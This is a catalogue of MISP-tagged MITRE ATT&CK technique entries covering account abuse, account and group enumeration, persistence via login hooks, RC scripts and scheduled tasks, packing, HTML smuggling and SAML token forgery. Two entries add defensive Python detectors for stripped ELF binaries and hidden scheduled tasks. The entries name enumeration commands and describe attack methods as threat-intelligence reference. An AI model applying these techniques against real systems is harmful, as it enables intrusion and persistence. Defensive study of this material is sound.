Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)

Default accounts are not limited to client machines; they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post-installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)

The tag is: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001"

Table 6014. Table References

Links

https://attack.mitre.org/techniques/T1078/001

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

Local Account - T1087.001

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.

The tag is: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"

Table 6015. Table References

Links

https://attack.mitre.org/techniques/T1087/001

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Malicious File - T1204.002

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)

While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002"

Table 6016. Table References

Links

https://attack.mitre.org/techniques/T1204/002

https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/

Socket Filters - T1205.002

Adversaries may attach filters to a network socket to monitor, and then activate, backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.

To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)

Filters can be installed on any Unix-like platform with libpcap installed or on Windows hosts using WinPcap. Adversaries may use either libpcap with <code>pcap_setfilter</code> or the standard library function <code>setsockopt</code> with the <code>SO_ATTACH_FILTER</code> option. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.

The tag is: misp-galaxy:mitre-attack-pattern="Socket Filters - T1205.002"

Table 6017. Table References

Links

http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf

https://attack.mitre.org/techniques/T1205/002

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

Software Packing - T1027.002

Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002"

Table 6018. Table References

Links

https://attack.mitre.org/techniques/T1027/002

https://github.com/dhondta/awesome-executable-packing

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

Malicious Image - T1204.003

Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)

Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003"

Table 6019. Table References

Links

https://attack.mitre.org/techniques/T1204/003

https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/

File Deletion - T1630.002

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019)

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1630.002"

Table 6020. Table References

Links

https://attack.mitre.org/techniques/T1630/002

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html

Login Hook - T1037.002

Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist entry that points to a specific script to execute with root privileges upon user logon. The entry lives in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks, where a script can be executed upon user logout. All hooks require administrator permissions to modify or create.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)

Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)

Note: Login hooks were deprecated in macOS 10.11 in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001).

The tag is: misp-galaxy:mitre-attack-pattern="Login Hook - T1037.002"

Table 6021. Table References

Links

https://attack.mitre.org/techniques/T1037/002

https://developer.apple.com/documentation/devicemanagement/loginwindowscripts

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Software Packing - T1406.002

Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.

Utilities used to perform software packing are called packers. An example packer is FTT. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1406.002"

Table 6022. Table References

Links

https://attack.mitre.org/techniques/T1406/002

Transport Agent - T1505.002

Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.

Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002"

Table 6023. Table References

Links

https://attack.mitre.org/techniques/T1505/002

https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help

https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

SAML Tokens - T1606.002

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)

An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization’s token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002"

Table 6024. Table References

Links

https://attack.mitre.org/techniques/T1606/002

https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

https://www.sygnia.co/golden-saml-advisory

HTML Smuggling - T1027.006

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline in HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)

Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.

For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)

The tag is: misp-galaxy:mitre-attack-pattern="HTML Smuggling - T1027.006"

Table 6025. Table References

Links

https://attack.mitre.org/techniques/T1027/006

https://outflank.nl/blog/2018/08/14/html-smuggling-explained/

https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/

https://www.menlosecurity.com/blog/new-attack-alert-duri

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

Upload Tool - T1608.002

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)

Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.

The tag is: misp-galaxy:mitre-attack-pattern="Upload Tool - T1608.002"

Table 6026. Table References

Links

https://attack.mitre.org/techniques/T1608/002

https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/

https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/

https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

Domain Groups - T1069.002

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"

Table 6027. Table References

Links

https://attack.mitre.org/techniques/T1069/002

Domain Accounts - T1078.002

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)

Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002"

Table 6028. Table References

Links

https://attack.mitre.org/techniques/T1078/002

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://technet.microsoft.com/en-us/library/dn535501.aspx

https://ubuntu.com/server/docs/service-sssd

Domain Account - T1087.002

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"

Table 6029. Table References

Links

https://attack.mitre.org/techniques/T1087/002

Stripped Payloads - T1027.008

Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variable names and other strings that help developers document code functionality. Symbols are often created by an operating system’s linker when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)

Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)
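To make concrete what "stripped" means at the file level, here is an added example (not code from the MITRE ATT&CK or MISP projects) that walks an ELF64 section header table and reports whether a <code>.symtab</code> section survives; the two sample images are constructed in memory and are not real binaries.

```python
"""Detect whether an ELF64 image still carries a symbol table (.symtab)."""
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
SHT_SYMTAB = 2     # full symbol table; this is what `strip` removes
SHT_STRTAB = 3
SHT_DYNSYM = 11    # dynamic symbols; the loader needs them, so they survive stripping
EHDR_FMT = "<16sHHIQQQIHHHHHH"   # ELF64 header, little-endian, 64 bytes
SHDR_FMT = "<IIQQQQIIQQ"         # ELF64 section header, 64 bytes


def section_types(blob: bytes) -> list:
    """Return the sh_type field of every section header in the image."""
    if len(blob) < struct.calcsize(EHDR_FMT) or blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    if blob[4] != ELFCLASS64:
        raise ValueError("only ELF64 is handled here")
    hdr = struct.unpack_from(EHDR_FMT, blob, 0)
    e_shoff, e_shentsize, e_shnum = hdr[6], hdr[11], hdr[12]
    if e_shnum and e_shentsize < struct.calcsize(SHDR_FMT):
        raise ValueError("section header entries too small")
    types = []
    for i in range(e_shnum):
        off = e_shoff + i * e_shentsize
        if off + struct.calcsize(SHDR_FMT) > len(blob):
            raise ValueError("section header table runs past end of image")
        types.append(struct.unpack_from(SHDR_FMT, blob, off)[1])   # sh_type
    return types


def is_stripped(blob: bytes) -> bool:
    """True when no .symtab (SHT_SYMTAB) is present. A surviving .dynsym does not count.

    An image with no section headers at all (e_shnum == 0) is also reported as stripped.
    """
    return SHT_SYMTAB not in section_types(blob)


def build_sample(with_symtab: bool) -> bytes:
    """Constructed ELF64 image: a header followed only by a section header table."""
    types = [0, SHT_STRTAB]            # SHT_NULL placeholder, .shstrtab
    if with_symtab:
        types.append(SHT_SYMTAB)
    types.append(SHT_DYNSYM)
    e_ident = ELF_MAGIC + bytes([ELFCLASS64, 1, 1]) + b"\x00" * 9  # class, LSB data, version 1
    ehdr = struct.pack(EHDR_FMT, e_ident,
                       2,      # e_type: ET_EXEC
                       0x3E,   # e_machine: x86-64
                       1, 0, 0,                      # e_version, e_entry, e_phoff (no program headers)
                       struct.calcsize(EHDR_FMT),    # e_shoff: section headers follow the header
                       0, struct.calcsize(EHDR_FMT), 56, 0,   # e_flags, e_ehsize, e_phentsize, e_phnum
                       struct.calcsize(SHDR_FMT), len(types), 1)  # e_shentsize, e_shnum, e_shstrndx
    shdrs = b"".join(struct.pack(SHDR_FMT, 0, t, 0, 0, 0, 0, 0, 0, 0, 0) for t in types)
    return ehdr + shdrs


if __name__ == "__main__":
    for label, sample in (("with .symtab", build_sample(True)), ("without .symtab", build_sample(False))):
        print(label, "->", "stripped" if is_stripped(sample) else "symbols present")
```

On a real file, pass the bytes of the whole binary to <code>is_stripped</code>; a result of "stripped" only says the static symbol table is gone, so strings and dynamic symbols may still be available to an analyst.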

The tag is: misp-galaxy:mitre-attack-pattern="Stripped Payloads - T1027.008"

Table 6030. Table References

Links

https://attack.mitre.org/techniques/T1027/008

https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/

https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

Embedded Payloads - T1027.009

Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs)

Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage)

For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021)

Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)

The tag is: misp-galaxy:mitre-attack-pattern="Embedded Payloads - T1027.009"

Table 6031. Table References

Links

https://attack.mitre.org/techniques/T1027/009

https://github.com/peewpw/Invoke-PSImage

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1

https://securelist.com/my-name-is-dtrack/93338/

https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html

RC Scripts - T1037.004

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script’s contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility, some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)

The tag is: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004"

Table 6032. Table References

Links

http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html

https://attack.mitre.org/techniques/T1037/004

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Scheduled Task - T1053.005

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> cannot access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from schtasks /query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., Index value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments)
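As an added defensive example (not code from the MITRE ATT&CK or MISP projects), the following parses a <code>.reg</code> export of the Task Scheduler <code>TaskCache\Tree</code> key and lists entries that carry an <code>Id</code> but no <code>SD</code> value, which is the hidden-task condition described above. The <code>TaskCache\Tree</code> path is the real key Task Scheduler uses; the task names, GUIDs and SD bytes in the sample export are constructed placeholders.

```python
"""Flag Task Scheduler Tree entries that have an Id but no SD (security descriptor) value."""

TREE_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Schedule\TaskCache\Tree" + "\\")

# Constructed .reg export (as produced by `reg export`, after decoding). Task names,
# GUIDs and the SD bytes are placeholders, not data from a real system.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\ExampleMaint]
"Id"="{11111111-2222-3333-4444-555555555555}"
"Index"=dword:00000003
"SD"=hex:01,00,04,80,14,00,00,00,30,00,00,00,00,00,00,00,20,00,00,00,02,00,\
  10,00,01,00,00,00,00,00,18,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Contoso\SyncHelper]
"Id"="{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"
"Index"=dword:00000003
"""


def parse_reg_export(text):
    """Coarse .reg parser: {key path: {value name: raw data}}.

    Hex data that reg.exe wraps onto several lines ends each partial line
    with a backslash; those pieces are joined before the value is stored.
    """
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        keys[current][name.strip('"')] = data
    return keys


def find_hidden_tasks(keys):
    """Registered tasks (Tree entries with an Id) whose SD value is missing.

    Folder nodes (the Microsoft and Windows folders in the sample) have neither
    Id nor SD and are not reported; only a node that names a task but lacks its
    security descriptor is, since that is what stops schtasks /query showing it.
    """
    hidden = []
    for path, values in keys.items():
        if path.startswith(TREE_PREFIX) and "Id" in values and "SD" not in values:
            hidden.append(path[len(TREE_PREFIX):])
    return sorted(hidden)


if __name__ == "__main__":
    for task in find_hidden_tasks(parse_reg_export(SAMPLE_REG)):
        print("task registered without an SD value:", task)
```

Pairing this check with the Sigma rule cited below (registry value deletion events) covers both the live deletion and the resulting state on disk.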

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"

Table 6033. Table References

Links

https://attack.mitre.org/techniques/T1053/005

